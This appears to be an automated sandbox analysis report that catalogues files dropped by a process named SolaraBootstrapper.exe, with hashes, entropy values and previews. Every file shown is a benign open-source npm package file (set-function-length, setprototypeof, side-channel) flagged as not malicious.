                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):4876
                                                  Entropy (8bit):5.28162329209841
                                                  Encrypted:false
                                                  SSDEEP:96:E5yEpQIJNQP7jcYLgsQBfgvvkpRK1LJ7sQTF693HjrbLQn1IXFJidmxh:EgiQIJ6TjcYLgsQBo0pRK1LJ7sQTF69p
                                                  MD5:6D4CBD4D65B24AA4BC8B68994E229941
                                                  SHA1:54FE62232E30863C8949A3620BCCE460840C69B3
                                                  SHA-256:0081798E43CB0864824314C375ECA40B031FA009F6ED27CF6F24E856D01FF759
                                                  SHA-512:0D24E8AE3FAA357EC28A789EC6557075213DB37FD03D14675E4E796CD60BCA5CEE4C7DF7B69A617D6FB3D8DE3C964B62D9787687FC00374FD0D0A6F5ACBE9802
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## [v1.2.2](https://github.com/ljharb/set-function-length/compare/v1.2.1...v1.2.2) - 2024-03-09..### Commits..- [types] use shared config [`027032f`](https://github.com/ljharb/set-function-length/commit/027032fe9cc439644a07248ea6a8d813fcc767cb).- [actions] remove redundant finisher; use reusable workflow [`1fd4fb1`](https://github.com/ljharb/set-function-length/commit/1fd4fb1c58bd5170f0dcff7e320077c0aa2ffdeb).- [types] use a handwritten d.ts file instead of emit [`01b9761`](https://github.com/ljharb/set-function-length/commit/01b9761742c95e1118e8c2d153ce2ae43d9731aa).- [Deps] update `define-data-property`, `get-intrinsic`, `has-property-descriptors` [`bee8eaf`](https://github.com/ljharb/set-function-length/commit/bee8eaf7749f325357ade85cf
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1083
                                                  Entropy (8bit):5.078342100284353
                                                  Encrypted:false
                                                  SSDEEP:24:vlrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:9aJHlxE3dQHOs5exm3ogFh
                                                  MD5:19283EE92F78C91154834571C1F05A94
                                                  SHA1:ACBFF97B52A807A3661247328DC45DF636D7B8F7
                                                  SHA-256:BF9B0D665BE2A689851EEA667CA9F42066EA1D903B38349C51E6A44B2577680A
                                                  SHA-512:22369CC02AF1D2A345A70A415DE9E690F3F14AD6567F216924BF05DCF01DBBDE7C6B3A08CF87D5EDF1CA3B5A793D504E532F3A7C828964E97024334135B57369
                                                  Malicious:false
                                                  Preview:MIT License..Copyright (c) Jordan Harband and contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT O
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):2167
                                                  Entropy (8bit):5.068958485134736
                                                  Encrypted:false
                                                  SSDEEP:48:H1eI4I7qP55IK6mjF9KdhxUzOPxOi38DPTh3IL0ICCI8wv:VXFeP7IDSyPEigTh4LxCL8a
                                                  MD5:66CA68BB26AC000BE6457E945A2507F0
                                                  SHA1:516686C84378E1EA4FE4BDA7396D4DFA95F605BE
                                                  SHA-256:54212493DCEC62FEC941C5A8231D65F57770DB3A3F68897CE838D7E8243F4D37
                                                  SHA-512:55E6ADDE7060987B5B6A8C25883D4301EB84ED4EAFCA4B59F3A59E796AA830E0E7FA0F045EAAF12617D3972575112FD4086880B4CCFDBC4077D903B49E2703E9
                                                  Malicious:false
                                                  Preview:# set-function-length <sup>[![Version Badge][npm-version-svg]][package-url]</sup>..[![github actions][actions-image]][actions-url].[![coverage][codecov-image]][codecov-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][npm-badge-png]][package-url]..Set a function.s length...Arguments:. - `fn`: the function. - `length`: the new length. Must be an integer between 0 and 2**32.. - `loose`: Optional. If true, and the length fails to be set, do not throw. Default false...Returns `fn`...## Usage..```javascript.var setFunctionLength = require('set-function-length');.var assert = require('assert');..function zero() {}.function one(_) {}.function two(_, __) {}..assert.equal(zero.length, 0);.assert.equal(one.length, 1);.assert.equal(two.length, 2);..assert.equal(setFunctionLength(zero, 10), zero);.assert.equal(setFunctionLength(one, 11), one);.assert.equal(setFunctionLength(two, 12), two);..assert.equal(zero.length, 10);.assert.equal(one.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):222
                                                  Entropy (8bit):4.651162342575511
                                                  Encrypted:false
                                                  SSDEEP:6:6cD6XbK/QQCnmRE1pP/7MlrRE1p5AQCnmRE1p5LMlrRE1pygQiZn:7D6XG+m+VM++m+M+YgQiZ
                                                  MD5:F9BFAF0FBE929BE59E378140244FF21B
                                                  SHA1:EB69950B8573CA5C3A14F6E9D7B9BF309980D9CD
                                                  SHA-256:3AA1D02AAAAD7915A3F62B8A679BA9C81FFCE8539089127EABC60FC50D5C39DC
                                                  SHA-512:D82554CCB97D0743E125D76B499047837E5BA2BE4C9F0C6C1E29E6FACD7BB1D5F4E4EBF8AE842EAD68C66C63B32B11ECE3A2AAE0E2A1A44A088DC522F52EF798
                                                  Malicious:false
                                                  Preview:declare const env: {..__proto__: null,..boundFnsHaveConfigurableLengths: boolean;..boundFnsHaveWritableLengths: boolean;..functionsHaveConfigurableLengths: boolean;..functionsHaveWritableLengths: boolean;.};..export = env;
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):867
                                                  Entropy (8bit):5.090086164326237
                                                  Encrypted:false
                                                  SSDEEP:24:5fYzKfFAPzeCRmm1miZBym+Ym0+G8mDmKdK:+CArec6
                                                  MD5:63EBC6CC71423925CF62B6435F253B5B
                                                  SHA1:57960E6B0FF7A4F9994C53953020133777A47F7C
                                                  SHA-256:51E8F137DFF2D3987C98BCBD677BDEC7306734A936F6C731E4DA154A5C69C372
                                                  SHA-512:177FA1BA5041931C328818DF6A886537332709FE727290B71946A74A8F57DBB8C2B83F54F292E46989A9E127C10EBC54279859BE66C28EA501B49FF93ADBEEEC
                                                  Malicious:false
                                                  Preview:'use strict';..var gOPD = require('gopd');.var bind = require('function-bind');..var unbound = gOPD && gOPD(function () {}, 'length');.// @ts-expect-error ts(2555) TS is overly strict with .call.var bound = gOPD && gOPD(bind.call(function () {}), 'length');..var functionsHaveConfigurableLengths = !!(unbound && unbound.configurable);..var functionsHaveWritableLengths = !!(unbound && unbound.writable);..var boundFnsHaveConfigurableLengths = !!(bound && bound.configurable);..var boundFnsHaveWritableLengths = !!(bound && bound.writable);../** @type {import('./env')} */.module.exports = {..__proto__: null,..boundFnsHaveConfigurableLengths: boundFnsHaveConfigurableLengths,..boundFnsHaveWritableLengths: boundFnsHaveWritableLengths,..functionsHaveConfigurableLengths: functionsHaveConfigurableLengths,..functionsHaveWritableLengths: functionsHaveWritableLengths.};.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):256
                                                  Entropy (8bit):4.647296473858828
                                                  Encrypted:false
                                                  SSDEEP:6:vuw/OtB+CY9s4qP4eUYYBrFOBipQDq2LVQihu3n:vuw/Ob+Cm9qweUYYtA4QDyihu3
                                                  MD5:BDF7EEFB056280C0DB7E37AFB831CBA2
                                                  SHA1:1970485CC5D8EBBE28369EF8CE60842A1BAEE346
                                                  SHA-256:F1DBFE4E162AB9E9DD14D9BC5CE5974C4EBC4FEDF5B682D634D8D5013637566C
                                                  SHA-512:352059E647C9E035736C0494FE644D69BA4314D6D7BF50021EF130147C1DCAC948769FC31E9F96B299F9307695A97A9D7B508C98B12FBB43FDAE090DC558C91E
                                                  Malicious:false
                                                  Preview:declare namespace setFunctionLength {. type Func = (...args: unknown[]) => unknown;.}..declare function setFunctionLength<T extends setFunctionLength.Func = setFunctionLength.Func>(fn: T, length: number, loose?: boolean): T;..export = setFunctionLength;
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1273
                                                  Entropy (8bit):5.155889077713486
                                                  Encrypted:false
                                                  SSDEEP:24:9GtfFfP+9ctoxByfZUmFW/AnB0o+sFUeWFU/w:AE9cSxWZsWxFfWF1
                                                  MD5:3F8DF1ED175B6F94BCA846B018F56F6D
                                                  SHA1:C983B09E4396B163486378B5B1F7AEFC532CB471
                                                  SHA-256:A523E45AE8C58B13795B66841FCAF104AC3E394AB123197BD46DD09088CABCD5
                                                  SHA-512:4001BD1D845650F0F04401E434E96D8404744C16C45D4DF3C0BCE46D43DD011B0F07AB45D38AF17B1BD37BE24C537D466613270479739E1269127AD2C72E439C
                                                  Malicious:false
                                                  Preview:'use strict';..var GetIntrinsic = require('get-intrinsic');.var define = require('define-data-property');.var hasDescriptors = require('has-property-descriptors')();.var gOPD = require('gopd');..var $TypeError = require('es-errors/type');.var $floor = GetIntrinsic('%Math.floor%');../** @type {import('.')} */.module.exports = function setFunctionLength(fn, length) {..if (typeof fn !== 'function') {...throw new $TypeError('`fn` is not a function');..}..if (typeof length !== 'number' || length < 0 || length > 0xFFFFFFFF || $floor(length) !== length) {...throw new $TypeError('`length` must be a positive 32-bit integer');..}...var loose = arguments.length > 2 && !!arguments[2];...var functionLengthIsConfigurable = true;..var functionLengthIsWritable = true;..if ('length' in fn && gOPD) {...var desc = gOPD(fn, 'length');...if (desc && !desc.configurable) {....functionLengthIsConfigurable = false;...}...if (desc && !desc.writable) {....functionLengthIsWritable = false;...}..}...if (functionLe
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2704
                                                  Entropy (8bit):5.101324766264455
                                                  Encrypted:false
                                                  SSDEEP:48:hvPZRYCzkc8gUPagS490fSyRYsEg4+kELXTNvKR4sz4PVl5yKQCbf4O3ZwjmfSoa:WCzCg8KI3+vLXTNvKR424gKf6H
                                                  MD5:D5C44D4CC2D418C8A4248912B241EA03
                                                  SHA1:BD0BCFC74BF8E9FE8D1EDB2B3A893D096A6067F7
                                                  SHA-256:2C81BAB7F7A60D625164BD840D863548E3F9D4D1AA976B9D2966E5E1E36132A7
                                                  SHA-512:56115E860931F409606432D47A9C13A50688C9B6C56DE8633B920F879F2E766A4DD2453DF3B3223FB4D7D73BFE8B4B2497DFFB395C070F73738F704DE4B8CCEB
                                                  Malicious:false
                                                  Preview:{.."name": "set-function-length",.."version": "1.2.2",.."description": "Set a function's length property",.."main": "index.js",.."exports": {...".": "./index.js",..."./env": "./env.js",..."./package.json": "./package.json"..},.."sideEffects": false,.."directories": {..."test": "test"..},.."scripts": {..."prepack": "npmignore --auto --commentLines=autogenerated",..."prepublish": "not-in-publish || npm run prepublishOnly",..."prepublishOnly": "safe-publish-latest",..."tsc": "tsc -p .",..."posttsc": "attw -P",..."prelint": "evalmd README.md",..."lint": "eslint --ext=js,mjs .",..."postlint": "npm run tsc",..."pretest": "npm run lint",..."tests-only": "nyc tape 'test/**/*.js'",..."test": "npm run tests-only",..."posttest": "aud --production",..."version": "auto-changelog && git add CHANGELOG.md",..."postversion": "auto-changelog && git add CHANGELOG.md && git commit --no-edit --amend && git tag -f \"v$(node -e \"console.log(require('./package.json').version)\")\""..},.."repository": {..."ty
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):116
                                                  Entropy (8bit):4.738285629546192
                                                  Encrypted:false
                                                  SSDEEP:3:SAL0x+HNNMgvZ63LW/mNHR+DRHtH79Upv5JoUifEIkHJ0GYv:zL0UDMgvEmIHERNH79o5JoUiMIOJnC
                                                  MD5:52FAD431B4493384DEB61BCA02E2FF01
                                                  SHA1:A16472424F8C26184DE557EFF8D6824939D1FC8E
                                                  SHA-256:6346EE4C020F341387588479DD83740A65AB902A462B8C6B3B8BF51F032C6795
                                                  SHA-512:35B51BDEA5BD3080B065D7AA72DE5DE16C5D839C6AF8671F8325D35B69F7DA5D9A5D53C53C38CCDBCF74847CC0BBF3D06E1ECA01415A1546FFD5581747B1434A
                                                  Malicious:false
                                                  Preview:{.."extends": "@ljharb/tsconfig",.."compilerOptions": {..."target": "es2021",..},.."exclude": [..."coverage",..],.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):727
                                                  Entropy (8bit):4.995407984851891
                                                  Encrypted:false
                                                  SSDEEP:12:BKftbCS4dCPXeTbbtLgmq6KX9KsA8dXsrUXA3+3Rz2AvzT3ka2C6K2PF3ew:2hBICCtEmq6s9iOncURnAqaF3ew
                                                  MD5:4846F1626304C2C0F806A539BBC7D54A
                                                  SHA1:8F107723A24DCE0CC8346B8909E124E3782DA6AE
                                                  SHA-256:76D6D1EA0C268DA37DD3C961B4FCFB23DEE8417FFF9E8786D4D44C585B781B69
                                                  SHA-512:563CEE3199EB3BE73EF14567B9ECC666510CF007B768B4E53EC2B5F84B8E09150072585012CBC186E282AF49DFE8E2B14D301FD0E3C6705A0157622D4380A16C
                                                  Malicious:false
                                                  Preview:Copyright (c) 2015, Wes Todd..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY.SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION.OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN.CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):844
                                                  Entropy (8bit):4.954798255004359
                                                  Encrypted:false
                                                  SSDEEP:12:fei0bxTJK0UxTgQRRIJqxwBoOB7gic/7aFI3fk3OE9yCGVvDIpvVI44Z/C1:feiO9Kv8QXD+qOB8NuivcRGVkpN1
                                                  MD5:618E2755F48DE164D10A4D5EF5EFCF6E
                                                  SHA1:ED286B68F2A24C26AF48969AF1503BE62415F317
                                                  SHA-256:5AC2886221898D2E967DF16753E4D64367957261D362FADD1817A9C80B1A6918
                                                  SHA-512:4CE2C1C6A0FA50234533067AE8CA12072D353FA3ED6302D0C00452D318713BC57604114933CB77C1AFF77A4D41F33DAB1C72E453AEC1C5408D0335F176324499
                                                  Malicious:false
                                                  Preview:# Polyfill for `Object.setPrototypeOf`..[![NPM Version](https://img.shields.io/npm/v/setprototypeof.svg)](https://npmjs.org/package/setprototypeof).[![NPM Downloads](https://img.shields.io/npm/dm/setprototypeof.svg)](https://npmjs.org/package/setprototypeof).[![js-standard-style](https://img.shields.io/badge/code%20style-standard-brightgreen.svg)](https://github.com/standard/standard)..A simple cross platform implementation to set the prototype of an instianted object. Supports all modern browsers and at least back to IE8...## Usage:..```.$ npm install --save setprototypeof.```..```javascript.var setPrototypeOf = require('setprototypeof')..var obj = {}.setPrototypeOf(obj, {. foo: function () {. return 'bar'. }.}).obj.foo() // bar.```..TypeScript is also supported:..```typescript.import setPrototypeOf from 'setprototypeof'.```.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):93
                                                  Entropy (8bit):4.403120517491775
                                                  Encrypted:false
                                                  SSDEEP:3:nPXxjvfl8s4HPgM/gihNjn:Vd4HPZgihNj
                                                  MD5:9B4107177BCDB4F9438D31BF446F629F
                                                  SHA1:25F582F0C09211CC1E095DED900797876768EC49
                                                  SHA-256:594108E052A71FBABF137A1139736186AF6E437A255705E99F8C666F4D2AF4C4
                                                  SHA-512:0D2F3209729887FA598DB6EDB720F227AE8DFB4FDBB89DF8051EDE69A038E47925EEA69D7F3136550019CC6E713FDB2D6BDCD1BE8293181247AE8EDE1D70FE70
                                                  Malicious:false
                                                  Preview:declare function setPrototypeOf(o: any, proto: object | null): any;.export = setPrototypeOf;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):407
                                                  Entropy (8bit):4.619014609580116
                                                  Encrypted:false
                                                  SSDEEP:12:lzFYBIPGbbPwwBErrJnBE8G2DQiAA8jl4Hy:/YB6GbbIwBErrZBE8GCA/jlGy
                                                  MD5:0426A4C38B91533C932059BCB80F163D
                                                  SHA1:3F772213640AEBA8A4E9ACBF5D8B31C91FCBC4B1
                                                  SHA-256:3E3495CA7AE72A7F0CA459F47DD3D97AE3A48FA4B1A669A31672BE778CC97A5F
                                                  SHA-512:3E94A6CFF02FBBB296701F979F79B65AEFD64C51A7619BD47DCA21B7A4361E209AA3D1D5D7D14BE86EF61043A1DCDA5071959F04FE9194A6ADFDFAFDCAD36432
                                                  Malicious:false
                                                  Preview:'use strict'./* eslint no-proto: 0 */.module.exports = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array ? setProtoOf : mixinProperties)..function setProtoOf (obj, proto) {. obj.__proto__ = proto. return obj.}..function mixinProperties (obj, proto) {. for (var prop in proto) {. if (!Object.prototype.hasOwnProperty.call(obj, prop)) {. obj[prop] = proto[prop]. }. }. return obj.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1264
                                                  Entropy (8bit):4.933621332439767
                                                  Encrypted:false
                                                  SSDEEP:24:mV1oZeHyUHR2U1f808J7+qlamKkMb4FrrAixz5TvPqPwxiMlR0QWIC:m/oZepHR20f808Jy/41fxz5z0wxvlR01
                                                  MD5:3C0480D60C15FE4FE27AE36205D1F949
                                                  SHA1:CBF2D7AE54256A7AB84245EB6D72C56F6A015453
                                                  SHA-256:5B39DDF23D2C12A751CB4AF2CE12DD5C87314350BE7526FFF69B4A3FF2A2D538
                                                  SHA-512:6D9B95BC662A09B5364F6FB943E208984CD50C23CCD5361BD86261FCEEAD997B203BB39721F0D82DB2D35D4FCC64BE70E48B71244DAA516DEC7EC09B61DADABC
                                                  Malicious:false
                                                  Preview:{. "name": "setprototypeof",. "version": "1.2.0",. "description": "A small polyfill for Object.setprototypeof",. "main": "index.js",. "typings": "index.d.ts",. "scripts": {. "test": "standard && mocha",. "testallversions": "npm run node010 && npm run node4 && npm run node6 && npm run node9 && npm run node11",. "testversion": "docker run -it --rm -v $(PWD):/usr/src/app -w /usr/src/app node:${NODE_VER} npm install mocha@${MOCHA_VER:-latest} && npm t",. "node010": "NODE_VER=0.10 MOCHA_VER=3 npm run testversion",. "node4": "NODE_VER=4 npm run testversion",. "node6": "NODE_VER=6 npm run testversion",. "node9": "NODE_VER=9 npm run testversion",. "node11": "NODE_VER=11 npm run testversion",. "prepublishOnly": "npm t",. "postpublish": "git push origin && git push origin --tags". },. "repository": {. "type": "git",. "url": "https://github.com/wesleytodd/setprototypeof.git". },. "keywords": [. "polyfill",. "object",. "setprototypeof". ],.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):690
                                                  Entropy (8bit):4.699872068343237
                                                  Encrypted:false
                                                  SSDEEP:12:l9Dqzp/ME9bfPBO+A2ATm8fI0aEIpBJjKeV5GbVm9TeVuFwz42+E:mMMbfPBO+A2AVfI0TIpBlKeLGb49Teoa
                                                  MD5:057B874F30E15981324966FF9294DBE5
                                                  SHA1:B91BB6EE713D8473B3B097B58549F651C6469410
                                                  SHA-256:44BED5FCCCB6C8F6CD92FF4BC034005B9D46BA560C572979944772555D4F2585
                                                  SHA-512:4950AD4C6C81AFE10A1C5696A5FDB056F826195A2DBBA958EB612DC3A727E50156901F95E46781936F5B8B84BBFB8A9264EC2210FBDC978C09EFA10B3B8C193D
                                                  Malicious:false
                                                  Preview:'use strict'./* eslint-env mocha */./* eslint no-proto: 0 */.var assert = require('assert').var setPrototypeOf = require('..')..describe('setProtoOf(obj, proto)', function () {. it('should merge objects', function () {. var obj = { a: 1, b: 2 }. var proto = { b: 3, c: 4 }. var mergeObj = setPrototypeOf(obj, proto).. if (Object.getPrototypeOf) {. assert.strictEqual(Object.getPrototypeOf(obj), proto). } else if ({ __proto__: [] } instanceof Array) {. assert.strictEqual(obj.__proto__, proto). } else {. assert.strictEqual(obj.a, 1). assert.strictEqual(obj.b, 2). assert.strictEqual(obj.c, 4). }. assert.strictEqual(mergeObj, obj). }).}).
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):145
                                                  Entropy (8bit):4.367933691486156
                                                  Encrypted:false
                                                  SSDEEP:3:BjM1vnFoqqA1Dvlk/rJbiDFalWjQWefxMvC2o/Pn:FM1vngODdedOZaVMvw/Pn
                                                  MD5:70AABD0764B023E42627FB94694D78BA
                                                  SHA1:232F2FCDDC7D54C6C7007DAEDC9B5F3088FDB3E0
                                                  SHA-256:F3E9230A5E411831564B0A83313248A7455929098F389C5BC07E8241A754D3FD
                                                  SHA-512:0C621AF2ED51BA7C02CFF5104993B53283FEF6B1F6EB0CCD573D95D664CDB25A1D0444BB8CD27609CDD6DE3796152CF13B738B00F0C2988FA7F3AE8089D7E29B
                                                  Malicious:false
                                                  Preview:root = true..[*].charset = utf-8.end_of_line = lf.insert_final_newline = true.indent_style = tab.indent_size = 2.trim_trailing_whitespace = true.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):185
                                                  Entropy (8bit):4.825356710364157
                                                  Encrypted:false
                                                  SSDEEP:3:EK8RL0x+Hf5NeVHI01QiLunHHIcR7GTIGChNX8/EoTVsKwR/6Csl6LoE0YOv:ExL0UxNSHIOLAnkzC38bCsluThA
                                                  MD5:15B7A9978CB5F6109FB49831718B4191
                                                  SHA1:66E00342C36357388D503DAF063C6645ED649CCA
                                                  SHA-256:7A1A04FF516AA6B2905885FE15F4F57858EA1703C92456DAED9763FA7B4EA7C6
                                                  SHA-512:58B1692D236EFE685BE86C0BB6DDB7C06B9BF9B8E5937A9375232425C5F07472E7818FC213B8BC0608EA11BF18E44558C1484716FDD0401A1323A57138CDAC92
                                                  Malicious:false
                                                  Preview:{.."root": true,..."extends": "@ljharb",..."rules": {..."max-lines-per-function": 0,..."multiline-comment-style": 1,..."new-cap": [2, { "capIsNewExceptions": ["GetIntrinsic"] }],..},.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):583
                                                  Entropy (8bit):4.693970033387882
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggMXclgM01bZBgMoGbQjgMy9gMLz4MI:qoQWAg0g+H0mghlg7g1GegJ9gEz4D
                                                  MD5:6B2A3ADC01B11269EC937729274541DF
                                                  SHA1:5FDD43E047D54B9989EA5623AB41F29090BF131E
                                                  SHA-256:1BAE2DD6CBA2F64D3780A4D3136EED2ED80B17888B0F2F169B90B65532EF1A4E
                                                  SHA-512:EC8127A909F23415085FE283D15BA24C945AF6C9E24368BEBA98F61336EB6206E8DEB1B3C9C1720C6D01488B01DAC378623615532FBCCCD4E4A5B12966D4825D
                                                  Malicious:false
                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/side-channel.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'].
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):216
                                                  Entropy (8bit):4.771900676344982
                                                  Encrypted:false
                                                  SSDEEP:6:Kw9OfyFdRaB9yq2TpR6S8U7XfUGUiMIOJHhBK:5O6FTaB9WTpR65U7cAMjJHe
                                                  MD5:C2AB942102236F987048D0D84D73D960
                                                  SHA1:95462172699187AC02EAEC6074024B26E6D71CFF
                                                  SHA-256:948366FEA3B423A46366326D0BB2E54B08ABD1CF0B243678BA6625740C40DA5A
                                                  SHA-512:E36B20C16CEEB090750F3865EFC8D7FD983AE4E8B41C30CC3865D2FD4925BF5902627E1F1ED46C0FF2453F076EF9DE34BE899EF57754B29CD158440071318479
                                                  Malicious:false
                                                  Preview:{.."all": true,.."check-coverage": false,.."reporter": ["text-summary", "text", "html", "json"],.."lines": 86,.."statements": 85.93,.."functions": 82.43,.."branches": 76.06,.."exclude": [..."coverage",..."test"..].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):8802
                                                  Entropy (8bit):5.265738800947733
                                                  Encrypted:false
                                                  SSDEEP:96:E5yEKjwBYQ4AuDJEb5joj4jbi6/tgNb66NS9La/4cflSBd/s4:EgmBgAGEbFojq7lMxua/4UUBdk4
                                                  MD5:BECEABFACC27597BA7AB25D06084BF55
                                                  SHA1:2415DF8EFBA411E5AD9A0200925384908B6E8C25
                                                  SHA-256:CA1B58A2915AC00E493F74E4B1448BDCB57F6AF7AA6875B5E0532818DEDBDEB3
                                                  SHA-512:6319D7645294DDBB8DA998F297E89CAF556B025B083673D0EEC79C218FEFB0EE955E999BD2210B4AD6A8AC6169C3A1AC4B1D91E6EACDB0F59406C49B6BF805AB
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## [v1.0.6](https://github.com/ljharb/side-channel/compare/v1.0.5...v1.0.6) - 2024-02-29..### Commits..- add types [`9beef66`](https://github.com/ljharb/side-channel/commit/9beef6643e6d717ea57bedabf86448123a7dd9e9).- [meta] simplify `exports` [`4334cf9`](https://github.com/ljharb/side-channel/commit/4334cf9df654151504c383b62a2f9ebdc8d9d5ac).- [Deps] update `call-bind` [`d6043c4`](https://github.com/ljharb/side-channel/commit/d6043c4d8f4d7be9037dd0f0419c7a2e0e39ec6a).- [Dev Deps] update `tape` [`6aca376`](https://github.com/ljharb/side-channel/commit/6aca3761868dc8cd5ff7fd9799bf6b95e09a6eb0)..## [v1.0.5](https://github.com/ljharb/side-channel/compare/v1.0.4...v1.0.5) - 2024-02-06..### Commits..- [actions] reuse common workflows [`3d2e1ff`]
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1071
                                                  Entropy (8bit):5.103097172056218
                                                  Encrypted:false
                                                  SSDEEP:24:5PsrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:BsaJHlxE3dQHOs5exm3ogFh
                                                  MD5:375DC7CA936A14E9C29418D5263BD066
                                                  SHA1:75CDD9C8D795941F851F43B18FC7DAE46E8A59FC
                                                  SHA-256:CFC3F455254C0AF0655CC3FF46A41ED644B67599F6043346169D285BF2B3CF3B
                                                  SHA-512:7767E362BE74A7C40A8EA0B4AA11F99D6BF7B2002C2871E2730F75915CCB3C2679E1CA4F211C3CCC993E9E7E3963AABFC89FD3FF17712BBEF304BB80BC582656
                                                  Malicious:false
